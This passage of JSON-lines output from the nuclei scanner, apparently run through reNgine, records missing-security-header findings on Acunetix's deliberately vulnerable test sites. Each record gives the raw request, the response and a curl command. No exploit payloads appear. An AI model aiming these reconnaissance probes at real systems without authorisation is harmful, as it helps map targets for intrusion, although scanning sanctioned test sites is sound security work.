Found\\u003c/title\\u003e\\n\\u003ch1\\u003eNot Found\\u003c/h1\\u003e\\n\\u003cp\\u003eThe requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:10.347918942Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50' 'http://testhtml5.vulnweb.com/.carousel'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Repository\",\"path\":\"/CVS/Repository\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Repository\",\"request\":\"GET /CVS/Repository HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 8\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:56 GMT\\r\\nEtag: \\\"4dca64a4-8\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\nacupart\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:10.347933463Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203' 'http://testphp.vulnweb.com/CVS/Repository'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/admin\",\"path\":\"/admin\",\"matched-at\":\"http://testhtml5.vulnweb.com/admin\",\"request\":\"GET /admin HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 308 PERMANENT REDIRECT\\r\\nConnection: close\\r\\nContent-Length: 253\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nLocation: http://localhost/admin/\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003eRedirecting...\\u003c/title\\u003e\\n\\u003ch1\\u003eRedirecting...\\u003c/h1\\u003e\\n\\u003cp\\u003eYou should be redirected automatically to target URL: \\u003ca href=\\\"http://localhost/admin/\\\"\\u003ehttp://localhost/admin/\\u003c/a\\u003e. If not click the link.\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:10.512676982Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/admin'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202\",\"path\":\"/static/app/libs/sessvars.js:202\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202\",\"request\":\"GET /static/app/libs/sessvars.js:202 HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:10.512738345Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/ajax/archive\",\"path\":\"/ajax/archive\",\"matched-at\":\"http://testhtml5.vulnweb.com/ajax/archive\",\"request\":\"GET /ajax/archive HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 2\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n[]\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:10.512755792Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48' 'http://testhtml5.vulnweb.com/ajax/archive'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/login\",\"path\":\"/login\",\"matched-at\":\"http://testhtml5.vulnweb.com/login\",\"request\":\"GET /login HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 405 METHOD NOT ALLOWED\\r\\nConnection: close\\r\\nContent-Length: 178\\r\\nAllow: POST, OPTIONS\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e405 Method Not Allowed\\u003c/title\\u003e\\n\\u003ch1\\u003eMethod Not Allowed\\u003c/h1\\u003e\\n\\u003cp\\u003eThe method is not allowed for the requested URL.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:10.512758358Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/login'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/comment\",\"path\":\"/comment\",\"matched-at\":\"http://testhtml5.vulnweb.com/comment\",\"request\":\"GET /comment HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Sorry, but commenting is currently disabled! \\u003c!-- invalid --\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:10.808417907Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36' 'http://testhtml5.vulnweb.com/comment'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at\",\"path\":\"/static/app/libs/sessvars.js:105at\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at\",\"request\":\"GET /static/app/libs/sessvars.js:105at HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:10.959624317Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/partials\",\"path\":\"/static/app/partials\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/partials/\",\"request\":\"GET /static/app/partials HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:50 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e403 Forbidden\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e403 Forbidden\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:10.959689527Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32' 'http://testhtml5.vulnweb.com/static/app/partials'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/contact\",\"path\":\"/contact\",\"matched-at\":\"http://testhtml5.vulnweb.com/contact\",\"request\":\"GET /contact HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 405 METHOD NOT ALLOWED\\r\\nConnection: close\\r\\nContent-Length: 178\\r\\nAllow: POST, OPTIONS\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e405 Method Not Allowed\\u003c/title\\u003e\\n\\u003ch1\\u003eMethod Not 